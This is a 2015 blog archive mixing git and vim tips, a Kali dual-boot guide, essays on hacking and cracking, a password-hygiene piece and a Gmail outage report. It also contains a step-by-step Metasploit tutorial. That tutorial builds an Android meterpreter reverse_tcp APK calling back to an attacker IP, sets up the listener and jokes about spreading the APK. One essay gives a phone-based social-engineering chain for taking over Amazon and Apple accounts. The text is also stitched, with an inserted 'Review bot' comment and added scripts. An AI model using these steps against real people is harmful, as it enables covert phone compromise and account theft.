Wednesday, 15 April 2015

Unix hacking for fun and learning.

In our workflow we are always looking for ways to be more productive, and to have more fun while developing. There’s nothing quite like the feeling of flying through a sequence of commands in bash that you know would take your peers twice as long to execute. Have you ever:
  • Raged silently at a coworker for spamming the left arrow key to get to the beginning of their terminal prompt when they could have just pressed CTRL + A ?
  • Watched someone as they enter the same command over and over when they could have just prefaced it with ! ?
  • Rolled your eyes as your buddy expounds at length on the virtues of IDEs when you know that you could “roflstomp” him or her using vim ?
If so, then these tips might be for you.
DISCLAIMER: There’s an admitted bias towards vim, git, and the terminal here. We don’t intend to start a holy war about terminals vs. IDEs, just to have some fun and point out these tricks that work well for us.

git add -p

If you’ve worked with git for any non-trivial amount of time you hopefully have come across the notion of making atomic commits. Essentially, the notion is that a commit should contain only interrelated details, and not anything that’s logically unrelated to the things you are committing. For example, it makes sense to commit changes to a class and its corresponding unit test in one commit, but if you’ve made changes to another class that deal with completely different business logic then those should be in another commit.
However, what happens when you are working within one file that contains multiple unrelated changes, or changes that you’d like to split up into more than one commit in case you need to revert them separately? Or you have sprinkled logging statements all over the file that you don’t want to commit to the repo? The normal sequence of git commands that people use fails us here:
$ git diff
diff --git a/some-file.c b/some-file.c
index f383179..09e4e35 100644
--- a/some-file.c
+++ b/some-file.c
@@ -2,6 +2,8 @@

 int main(void) {
        printf("doing some stuff\n");
-       printf("doing some more stuff\n");
+       do_some_stuff();
+       printf("doing some unrelated stuff\n");
+       do_some_unrelated_stuff();
        return 0;
 }
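Review bot: this hunk bundles two logically separate changes: replacing the `printf("doing some more stuff\n");` line with `do_some_stuff();`, and adding the `printf("doing some unrelated stuff\n");` / `do_some_unrelated_stuff();` pair. Since there is no unchanged line between the two edits, `git add -p` cannot separate them with `s`; use `e` to keep only the first part of the hunk in the staged patch and commit the unrelated pair separately, so each commit stays atomic.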
$ git add some-file.c
$ git commit
[master 1938906] some unrelated stuff, cramming it all in one commit 'cause I'm lazy
 1 file changed, 3 insertions(+), 1 deletion(-)
$ echo "Whoops we just committed unrelated stuff.  Not very modular of us."
The -p (standing for patch) flag for git add is ridiculously useful for these kinds of cases. It tells git add that we want to do a partial add of the file, and we’re presented with a nice interactive menu which allows us to specify, with a lovely amount of detail, exactly which parts of the file we want to stage. git splits the changes into hunks automatically, which you can approve or reject with y or n respectively, or use s to split them into finer-grained hunks. If git can’t split the hunks up the way you want automatically, you can specify as much detail as you want with the e (edit) option.

And now our commits are nice and tidy.
See here for more details on git add -p
EDIT: Some commenters have pointed out that this usage of -p flag also works for commands such as git checkout --. Therefore you could hypothetically send only part of a file back to the way it was at HEAD, and keep your other changes. Handy!

vim’s CTRL-P / CTRL-N autocomplete feature

This is one of those killer features of vim that we are surprised to find out people (even experienced vim gurus) don’t use more frequently. Even if you are a casual user (hop into vim to edit some config files while sshed into a box) it has the potential to help you out quite a bit. One of the reasons people claim they couldn’t live without IDEs is the existence of features such as Intellisense that provide autocompletion of variable/function names. These features are very nice since they cut down on mistakes due to misspelling properties and thereby speed up the compile/run/debug cycle a fair bit. Many people don’t seem to realize that there is an analog which comes straight out of the box in vim, no plugins needed.
You can press CTRL-N to move down the list of suggested completions when typing in INSERT mode (which vim draws from the current buffers, and from the tags file if you have one), or CTRL-P to move back up (representing “NEXT” and “PREVIOUS” if you didn’t catch the mnemonic). If there is only one possible completion, vim will just go ahead and insert it. Very handy and speedy, especially in codebases with a lot of long variable / method / constant names.
CTRL-P/CTRL-N have a lot of synergy with the next tip as well, as touched upon briefly in the above paragraph.

And you barely need to leave the home row.

exuberant ctags

Everyone who uses vim knows that it can be a bit of a kerfuffle sometimes to open a file in a distant directory (tab completion helps ease this with :e, but it’s still not usually instantaneous). If you happen to be working on a team, or a very large project, the ability to do this quickly will likely be a vital part of your workflow.
Exuberant Ctags is a tool that makes this worlds easier than it would be without it. With ctags, you can just run a command in the top directory of the project you’re working on to generate a “tags” file, then use CTRL-] to “pop into” the definition of whatever your cursor is over (say, a class name). Press CTRL+T to get back to where you were before.
You can even set up a post-commit hook in git to generate your ctags file automatically when you make a commit! Nice.
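The post-commit hook mentioned above is a few lines of shell. What follows is an added example, not code from the original post: `install_ctags_hook` writes a `.git/hooks/post-commit` script that rebuilds the tags file from the repository root, and `demo_ctags_hook` exercises it in a constructed temp repository. The hook skips quietly on machines without ctags, and the demo adds `tags` to `.gitignore` so the generated file never ends up in a commit.

```shell
#!/bin/sh
# Added example (not from the original post): a post-commit hook that rebuilds
# the tags file after every commit, plus a demo that installs it into a
# constructed temporary repository. Function names are hypothetical; the hook
# path is the one git itself uses.

# Install the hook into the repository whose top-level directory is $1.
install_ctags_hook() {
    hook="$1/.git/hooks/post-commit"
    mkdir -p "$(dirname "$hook")"
    cat > "$hook" <<'EOF'
#!/bin/sh
# Regenerate the tags file so CTRL-] in vim keeps jumping to current definitions.
cd "$(git rev-parse --show-toplevel)" || exit 1
command -v ctags >/dev/null 2>&1 || exit 0   # no ctags on this box: skip quietly
ctags -R --exclude=.git -f tags . 2>/dev/null
EOF
    chmod +x "$hook"
}

# Demo: make a repo, install the hook, commit a C file, report what happened.
# Runs in a subshell so the cd does not leak into the caller.
demo_ctags_hook() (
    command -v git >/dev/null 2>&1 || { echo "git not installed"; exit 0; }
    repo=$(mktemp -d)
    cd "$repo" || exit 1
    git init -q . 2>/dev/null
    git config user.email "dev@example.com"   # constructed identity for the demo
    git config user.name "Example Dev"
    printf 'tags\n' > .gitignore                 # never commit the generated tags file
    printf 'int do_some_stuff(void) { return 1; }\n' > some-file.c   # constructed source
    install_ctags_hook "$repo"
    git add .gitignore some-file.c
    git commit -q -m "add do_some_stuff" >/dev/null   # triggers the post-commit hook
    if [ -f tags ] && grep -q '^do_some_stuff' tags; then tags=built
    elif command -v ctags >/dev/null 2>&1; then tags=missing
    else tags=skipped; fi
    if [ -x .git/hooks/post-commit ]; then hook=ok; else hook=bad; fi
    echo "hook=$hook tags=$tags"
    cd / && rm -rf "$repo"
)

demo_ctags_hook
```

On a machine with Exuberant Ctags installed this prints `hook=ok tags=built`; without ctags it prints `hook=ok tags=skipped`. Hooks are not versioned, so each clone needs the hook installed once (or `core.hooksPath` pointed at a shared directory).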

CTRL-R in bash and zsh

Ever been typing in a command at the terminal, when you suddenly find yourself wishing that there was an easy way to just autofill the prompt with something that you’d entered previously so you can edit it or just run it again? If so, then I’ve got good news for you: You can! Just press CTRL+R and start typing the thing that you are looking for. The terminal will fill in what it thinks you are looking for, and if there is more than one option you can cycle through them by pressing CTRL+R repeatedly. When you’ve found the thing you’re after, you can break out of the prompt with any of the usual movement commands (CTRL+A, CTRL+E, arrow keys, etc. if you have standard bash keybindings). Try it out! Very handy if you can’t remember the name of the box you want to ssh into.

What was that IP address again?
history | grep $COMMAND will treat you well too, if you just want to review all of the times you’ve run that command in recent times.

vim macros

A lot of the time when you’re writing code, or doing related tasks, you find yourself in need of a way to repeat the same editor commands over and over, perhaps with a slight variation. Different editors provide slightly different ways of addressing this. Sublime Text, for example, has a “killer feature” where you are able to place multiple cursors in various locations and edit away. In vim (and in emacs too, but here we’ll be covering the vim method) you record and playback keyboard macros to accomplish this. It is a tool with an absurd amount of power and flexibility, and offers the chance to speed up productivity on repetitive editing tasks by an order of magnitude.
To make a macro, press q in normal mode, then press another key to “name” the macro (usually we use q again). vim will start recording your keystrokes. vim will remember which keystrokes you make until you press q again to save the macro. You can replay with @-letter in normal mode, so we are usually pressing @q. You can also preface the @/replay command with a number so that you can rapidly execute your macro over and over (like much in vim-land, the “grammar” behaves as you would be accustomed to). If you’re accustomed to using vim’s fancy movement commands (for instance, using / search to navigate), and practice a little bit, you will soon be able to whip up thunderous macros that will leave your mouse-dependent colleagues in the dust.

Monday, 13 April 2015

Hacking Android Smartphone Tutorial using Metasploit software on unix using Kali Linux

Nowadays mobile users are increasing day by day, and the security threat is increasing together with the growth in users. Our tutorial for today is how to hack an Android smartphone using Metasploit. Why did we choose an Android phone for this tutorial? Simply because lately Android phones have been growing very fast worldwide. Here in China you can get an Android phone for only US$ 30; that is one of the reasons why Android is growing fast.

What is Android? According to Wikipedia:
Android is an operating system based on the Linux kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices.
And what is an APK? According to Wikipedia:
Android application package file (APK) is the file format used to distribute and install application software and middleware onto Google's Android operating system; very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like Ubuntu.
Here is some initial information for this tutorial:
Attacker IP address: 192.168.8.94
Attacker port to receive connection: 443
Requirements:
1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)
2. Android smartphone (we use HTC One android 4.4 KitKat)


Step by Step Hacking Android Smartphone Tutorial using Metasploit:

1. Open a terminal (CTRL + ALT + T); see the tutorial on how to create a Linux keyboard shortcut.
2. We will use the Metasploit payload framework to create the exploit for this tutorial.
msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>
As described above, the attacker IP address is 192.168.8.94; below is our screenshot after executing the command.
3. Because our payload is reverse_tcp, where the attacker expects the victim to connect back to the attacker machine, the attacker needs to set up a handler for incoming connections on the port specified above. Type msfconsole to go to the Metasploit console.
Info:
use exploit/multi/handler –> we will use the Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same as in step 2
4. Next we need to configure the options for the Metasploit payload we specified in step 3.
Info:
set lhost 192.168.8.94 –> attacker IP address
set lport 443 –> port to listen on for the reverse connection
exploit –> start listening for incoming connections
5. The attacker already has the APK file and now starts distributing it (I don't need to describe how to distribute this file; the internet is a good place for distribution :-) ).
6. Short story: the victim (me myself) downloads the malicious APK file and installs it. After the victim opens the application, the attacker's Metasploit console gets something like this:
7. This means that the attacker is already inside the victim's Android smartphone and can do everything with the victim's phone.
Conclusion:
1. Don't install APKs from unknown sources.
2. If you really want to install an APK from an unknown source, make sure you can view, read and examine the source code. The picture below is the source code of our malicious APK in this tutorial.
Courtesy: hacking-tutorial.com

Kali Linux Dual Boot with Windows

Installing Kali alongside a Windows installation can be quite useful. However, you need to exercise caution during the setup process. First, make sure that you’ve backed up any important data on your Windows installation. Since you’ll be modifying your hard drive, you’ll want to store this backup on external media. Once you’ve completed the backup, we recommend you peruse Kali Linux Hard Disk Install, which explains the normal procedure for a basic Kali install.
In our example, we will be installing Kali Linux alongside an installation of Windows 7, which is currently taking up 100% of the disk space in our computer. We will start by resizing our current Windows partition to occupy less space and then proceed to install Kali Linux in the newly-created empty partition.
Download Kali Linux and either burn the ISO to DVD, or prepare a USB stick with Kali Linux Live as the installation medium. If you do not have a DVD drive or USB port on your computer, check out the Kali Linux Network Install. Ensure you have:
  • Minimum of 8 GB free disk space on Windows
  • CD-DVD / USB boot support

Preparing for the Installation

  1. Download Kali Linux.
  2. Burn The Kali Linux ISO to DVD or copy Kali Linux Live to USB.
  3. Ensure that your computer is set to boot from CD / USB in your BIOS.

Dual Boot Installation Procedure

  1. To start your installation, boot with your chosen installation medium. You should be greeted with the Kali boot screen. Select Live, and you should be booted into the Kali Linux default desktop.
  2. Now launch the gparted program. We’ll use gparted to shrink the existing Windows partition to give us enough room to install Kali Linux.
  3. Select your Windows partition. Depending on your system, it will usually be the second, larger partition. In our example, there are two partitions; the first is the System Recovery partition, and Windows is actually installed in /dev/sda2. Resize your Windows partition and leave enough space (8 GB minimum) for the Kali installation.
  4. Once you have resized your Windows partition, ensure you “Apply All Operations” on the hard disk. Exit gparted and reboot.

Kali Linux Installation Procedure

  1. The installation procedure from this point onwards is similar to a Kali Linux Hard Disk install, until the point of partitioning, where you need to select “Guided – use the largest continuous free space”, which is the space you created earlier with gparted.
  2. Once the installation is done, reboot. You should be greeted with a GRUB boot menu, which will allow you to boot either into Kali or Windows.

Post Installation

Now that you’ve completed installing Kali Linux, it’s time to customize your system. The Kali General Use section of our site has more information and you can also find tips on how to get the most out of Kali in our User Forums.
Courtesy: docs.kali.org

Sunday, 12 April 2015

What is actually hacking? Don't worry, we will tell you.

The other day, a junior of mine was narrating to a group how he hacked into a friend's Facebook profile. Great, I thought. Kids nowadays are turning out to be pretty smart. However, his emphasis was on what he did (about a lame ass chat with a lame ass girl) rather than how he did it. Turns out his friend had left his account open, and he just happened to be there. The meme here says it all.

That is not hacking. Hacking is something completely different. A more popular story comes to my mind. Last year, the digital life of a Wired.com writer, Mat Honan, was completely destroyed by hackers (note that he was targeted just because they liked his three-letter Twitter handle). The hacker, who contacted him later, calling himself Phobia, got a link to his personal website, which mentioned his Gmail address. They attempted a Google account recovery, which showed the alternate email address as m••••n@me.com.
The me.com email was associated with his Apple account. Phobia got his billing address from a whois search on his personal domain. Getting the credit card number was a bit tricky though. But not tricky enough.
First you call up Amazon and add a credit card to your account. All you need is a name, an email and a billing address. After that, you call them again and say you lost access to your account. On providing the name, billing address and the bogus credit card you added in your last call, Amazon allows you to add a new email address to your account. Voila! You have access to the Amazon account.
Next, with the actual credit card number, billing address and name, you call AppleCare and get the account reset. With access to the Apple ID, you get access to the me.com ID, and then Gmail, and then whatever else is connected. The hackers erased all the information on his iPhone and MacBook. Mat Honan managed to get everything back though; here's the story in his own words.

Let me tell you another one. Indian-born Cornell University student Debarghya Das was asked by his friends to get the results of the CICSE a day before they were released. He studied the poorly written JavaScript on the page and wrote a script to extract all the results (which were, surprisingly, public!). He has described the process in a Quora post. What he did after extracting the results was to analyse them, and the results were shocking. I would not stress his conclusions but rather his process. Although newspapers claimed he 'hacked' into the ICSE system, it was the result of simple web scraping.
These two contrasting stories bring me to my very point. Who is a hacker? Simply put, hackers are doers.
Source: http://on.fb.me/1aWkQpz

As the infographic suggests, hacking doesn't necessarily mean searching for vulnerabilities in a computer system and taking advantage of them. A hacker is simply a computer enthusiast who loves solving problems. Not just mathematical problems, but real-life problems.

The common man, though, has a great misconception. The term hacker is generally associated with something which we fondly call crackers. A cracker is someone who seeks and exploits weaknesses in a computer system or network. Modern media is to blame, having continuously confused the public by using the term hacker for the term cracker! Take for instance the ruckus they created when Debarghya Das scraped the CICSE results. Newspapers like The Daily Mail, The Hindustan Times and The Times of India claimed that he 'hacked' into the system when it was a case of simple web scraping of publicly available data.

Then there are personalities like Ankit Fadia who are fooling the public with their hacking courses: you can't possibly hack into Gmail or Facebook by pressing a button or with one click. In fact, all those stories you hear are caused by the ignorance of the people, just as Mat Honan suggested. He says that had he put two-step authentication on Gmail, his hack could never have progressed.

That being said, how do hackers (read: crackers) break into computer systems and networks? It's all about finding the right pattern in the labyrinth of data, which we call noise! You have just got to look hard enough, and you would definitely find the required pattern; and once you do, breaking in is a piece of cake.

In one of the TED talks last year, Angad Nadkarni, a self-proclaimed hacker, talks about hacking in general and how he 'hacked' into the Indian education system to save students from the noise of education in India, ranging from reference books to coaching institutions. Well, he was right in terms of the use of the term 'hacking' for sure. He named his application Examify.

What the application does is pretty simple. It takes in a large volume of question papers and analyses them to tell you what to study and what not to study. How does the application do it? Well, as it goes through the given data set, it assigns probabilities to different topics. That means the larger the data set, the more accurate the prediction.

It's basically a classic example of supervised machine learning, and more precisely a case of binary classification. Binary classification involves classifying the members of a given set of objects into two groups based on whether they have some property or not. The process involves feeding the system a data set of past information so that it is able to predict, with a certain probability, the category or group of any new data.

In the case of Examify, the binary groups would be whether a question/topic would be asked in the next exam or not. Theoretically, we can go up to an infinite number of properties, but in practice we generally stick with a more humane number.

Examify is an example of how true hackers work. I would like to conclude with a quote by Rasmus Lerdorf, the creator of PHP.
I actually hate programming, but I love solving problems! And programming is an unfortunate way of solving the said problems...

Courtesy: http://theblogbowl.in

Saturday, 11 April 2015

Hacking and Cracking?

Hacking and cracking: two different forms of Internet- and computer-related privacy and copyright breaches, usually malicious. I'll be discussing the differences between hacking and cracking. They are two completely different things, but people usually get confused between the two; they both end with a similar sound, 'acking' (that's probably why!), and they're both malicious forms of cyber activity.

• Let's start off by explaining what the words mean, in computer vocabulary that is. Hacking is the act of stealing personal or private data without the owner's knowledge or consent; it could also include other things like stealing passwords, creating a botnet, or pretty much any act that breaches someone's privacy without their knowledge or consent.
• Now, on to cracking. Cracking is where you edit a program's source code, or create a program like a key generator (more commonly known as a 'keygen'), a patch, or some sort of application that tricks an application into thinking that a particular process has occurred. For example, a key generator and a patch for the Adobe Master Collection would trick the software into thinking that the key entered is correct, and not let it verify the key with the Adobe master server. Cracking is pretty much looking for a back door in software and exploiting it for malicious use or for a copyright-breaching act.
The difference (if you have not noticed it yet) is that a hacker is someone who uses their extensive knowledge of computer logic and code for malicious purposes, while a cracker looks for back doors in programs and exploits those back doors. Cracking is generally less harmful than hacking. Hackers are usually involved with web-related hacking, like MySQL interception or phishing; other forms of hacking would include things like brute force or password lifting.

Well, the difference is simple. One is more malicious than the other; crackers usually have extensive knowledge of code related to Python and .NET (Visual Basic, C, C++, C#) and Objective-C (Mac), while hackers are fluent in different forms of web code, like PHP, MySQL, JavaScript, Ajax, HTML and CSS. I hope, after reading this, we have all got what the difference between hacking and cracking is. Basically, it's just what they do that's the difference.

Courtesy: http://hackingvscrackingb31.blogspot.in

Do you think setting your password as 'password' is a dumb thing?

Why it is dumb to have 'password' as password
Despite the increasing necessity to protect their digital assets, many people continue to share their passwords with friends, family members and even work colleagues.
NEW DELHI: A few weeks ago, the producers of Jimmy Kimmel's show were up to no good. Going around the streets of Los Angeles, they pretended to help people understand how secure their passwords were, by asking them to reveal, well, their password. And believe it or not, a few dummies fell for this piece of mischief and disclosed their passwords on national TV.

Now you'd think you would have known better, but it turns out that most of us are not very different. Lately, a lot has been said about cybersecurity: the private iCloud images of celebrities leaked, the Sony hack that laid bare the private correspondence among movie executives (even the employees' salaries), Snapchat pictures which users thought were deleted, along with multiple Facebook and Twitter account hacks. SplashData came out with its annual list of the most common passwords used, and the list proves that there are people who still use "123456" and "password" as their passwords (we kid you not!).

"In the wired 21st century, passwords are proliferating at an alarming rate," the firm said in its report. "It's no surprise, then, that users often succumb to password fatigue and commit such security sins as using passwords based on names or words culled from a dictionary, reusing passwords or writing them down on pieces of paper that are left lying around the office."

Despite high-profile data breaches becoming the norm and with 2014 being called the year of cyberhacks and leaks, people are still using passwords that should have been tossed in the bin a long time ago, simply because they don't see themselves as 'hack-worthy'.

Why would anybody hack me?
In the extremely grave context of the recent leaks, there are people who just see it as someone else's problem, because 'why would anyone want to hack them?' Shifani Reffai, a food and lifestyle writer, says she has nothing to lose even if her account does get hacked. "If you're not in the public eye, chances are that no one is actively trying to hack you. That's the reality. Therefore, there is no need to overcomplicate your passwords to the point that it becomes a challenge to remember them or even worse, end up writing them down on paper," she says.

She adds that though she does feel unsafe online, especially since what you share on one platform is synced with another, she'd rather curb her online activity in order to keep some of her privacy than have complicated passwords that are too hard to remember.

Same password for all accounts easy to remember
Research shows that 16% of passwords matched a person's first name, 14% were patterns on the keyboard, 4% were variations of the word "password", 5% referenced pop culture, and 4% likely described things near the user when picking a password.

It is no surprise, then, that the majority of people disclosing their passwords on Jimmy Kimmel's show chose their birth dates and pets' names as their passwords. Now either you're a genius adept at remembering multiple sets of complex passwords, or you're just using the same basic password combinations for most accounts. There is more than one reason to believe the latter is true.

Kriti Aggarwal, co-founder of an event management firm in the city, says that cyberhacks don't stop her from having the same password for all accounts. "As far as I can remember, I've had the same password for all my accounts and it has also been the simplest and easiest to remember. The type of privacy I'm worried about isn't privacy from the government, marketers, spam or phishers," she explains. "It's privacy from my parents, siblings and colleagues. At most what I can be worried about is if my bank account details get leaked, but I think I am cautious enough when it comes to that. I don't have to worry about some really confidential information being leaked, because let's face it, I'm not that important," she says.

Sharing passwords with friends, family and colleagues
Despite the increasing necessity to protect their digital assets, many people continue to share their passwords with friends, family members and even work colleagues, because according to them there is nothing so compromising that they'll regret it later.

Research has shown that people have gotten comfortable with sharing more information openly and with more people. "Most of my colleagues know my computer's password in the office as someone or the other needs to use it once in a while. I have passwords of the websites I visit saved in my browser but I don't expect my colleagues to go through my personal emails or steal my bank account information because I trust them. Some of my friends have access to my Facebook and Twitter accounts as well because I have nothing to hide from them and hence, there is no need to use a complicated 'strong' password," says Gitika Sharma, a graphic designer.

Facebook, Gmail relatively safer
Facebook gives users the option to adopt two-factor authentication, but it would be interesting to see just how many people have implemented it. This shows that there is still a wide gap between consumer knowledge and perception.

Gaurav Sharma doesn't think social networking sites such as Facebook and Twitter, and something as simple as checking your emails on Gmail, require a two-level authentication procedure. "Using a strong password does help a lot but the problem is that few of us can remember many such strong passwords. I do change passwords for my accounts, but not very frequently for Facebook and Gmail. I find these relatively safer websites to work on and don't find the need to turn two-factor on," says Gaurav.

So what is a good password?
Experts define a strong password as one that is 'difficult to crack, has combinations of upper- and lower-case letters, numbers and special characters and should be different for each site'; definitely not the word "password". But the news isn't all that bad. The study also shows that even though the list of the most common passwords may be astonishing, the passwords in the list aren't necessarily the same as the most leaked ones.

People are moving away from using such passwords, but the rate is definitely slower than we'd expect.
Courtesy: TOI

Tuesday, 7 April 2015

Google Gmail users hit by software glitch

The glitch hit people using Gmail and some of Google's apps

Gmail users around the world saw errors and safety warnings over the weekend after Google forgot to update a key part of the messaging software.
Google said a "majority" of users were affected by the short-term software problem.
While people could still access and use Gmail, many saw "unexpected behaviour" because of the problem.
Many reported the errors via Twitter, seeking clarification from Google about what had gone wrong.
The error messages started appearing early on 4 April and hit people trying to send email messages from Gmail and some of the firm's messaging apps.
The problems arose because Google had neglected to renew a security certificate for Gmail and its app services. The certificate helps the software establish a secure connection to a destination, so messages can be sent with little fear that they will be spied upon.
Google's own in-house security service, called Authority G2, administers the security certificates and other secure software systems for the search giant.
Information about the problem was posted to the status pages Google maintains for its apps and email services.
In the status message, Google said the problem was "affecting a majority of users", who were seeing error messages. It added that the glitch could cause programs to act in "unexpected" ways.
The problem was resolved about two hours after it was first noticed.
The glitch comes soon after Google started refusing security certificates issued by the China Internet Network Information Center (CNNIC). Google said a security lapse by the CNNIC meant the certificates could no longer be trusted. CNNIC called the decision "unacceptable and unintelligible".
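An expired certificate of the kind described in the article above is easy to catch ahead of time with a scheduled check. The following is an added example, not from the article or from Google: `cert_ok_for_days` wraps `openssl x509 -checkend`, which reports whether a certificate file will still be valid a given number of days from now, and `demo_cert_check` generates two throwaway self-signed certificates (one valid for 2 days, one for a year, both constructed here with a hypothetical `mail.example.test` name) and runs the check against a 7-day renewal window. In practice the same function would be pointed at the certificate files a server actually serves, and a non-zero result would page whoever owns renewal.

```shell
#!/bin/sh
# Added example (not from the article): a renewal check that flags certificates
# expiring within a window, so they are renewed before users see errors.
# Uses only the openssl CLI; the certificates below are self-signed throwaways
# generated for the demo.

# Exit 0 if the certificate in file $1 is still valid $2 days from now, and 1 if
# it expires (or has already expired) inside that window. `-checkend` takes the
# window in seconds, hence the conversion from days.
cert_ok_for_days() {
    openssl x509 -in "$1" -noout -checkend $(( $2 * 86400 )) >/dev/null 2>&1
}

# Constructed demo: one certificate that expires in 2 days, one good for a year,
# both checked against a 7-day renewal window.
demo_cert_check() {
    command -v openssl >/dev/null 2>&1 || { echo "openssl not installed"; return 0; }
    dir=$(mktemp -d)
    for days in 2 365; do
        openssl req -x509 -newkey rsa:2048 -nodes -subj "/CN=mail.example.test" \
            -days "$days" -keyout "$dir/key$days.pem" -out "$dir/cert$days.pem" \
            >/dev/null 2>&1 || { echo "keygen failed"; rm -rf "$dir"; return 1; }
    done
    short=ok
    cert_ok_for_days "$dir/cert2.pem" 7 || short=expiring
    long=ok
    cert_ok_for_days "$dir/cert365.pem" 7 || long=expiring
    rm -rf "$dir"
    echo "short=$short long=$long"
}

demo_cert_check
```

The demo prints `short=expiring long=ok`. A 7-day window is a reasonable floor for a cron job; pick something longer than the time it takes your renewal process (manual or automated) to complete end to end.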